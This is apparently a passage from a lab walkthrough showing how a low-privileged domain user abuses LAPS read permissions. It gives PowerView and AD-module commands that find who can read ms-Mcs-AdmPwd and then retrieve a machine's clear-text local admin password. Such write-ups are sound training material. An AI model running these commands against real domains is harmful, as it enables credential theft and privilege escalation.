The LAPS is used to store the Local Admins passwords in the active directory however the abuse comes when a normal user have a permission to read the attribute that stores the Local Admin Password

Untitled

Untitled

Now let’s Use PowerView to Get LAPS permissions

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -Like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -Match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

Untitled

As Observed we found out that the StudentUsers can read the attribute ms-Mcs-AdmPwd (Attribute that stores the local admin password in clear-text) on the machine MailMgmt

Enumerating LAPS Permissions using AD-Module And The Get-LAPSPermissions Script

Loading AD-Module

Import-Module ./Microsoft.ActiveDirectory.Management.dll
Import-Module ./ActiveDirectory.psd1

Untitled

Now let’s run the Get-LAPSPermissions Script

.\\Get-LAPSPermissions.ps1

Untitled

As Observed we found out that the StudentUsers can read the attribute ms-Mcs-AdmPwd (Attribute that stores the local admin password in clear-text) on the machine MailMgmt

Now let’s Read The Password from the ms-Mcs-AdmPwd Attribute

Get-DomainComputer | Where-Object samaccountname -match mailmgmt | select samaccountname, ms-Mcs-AdmPwd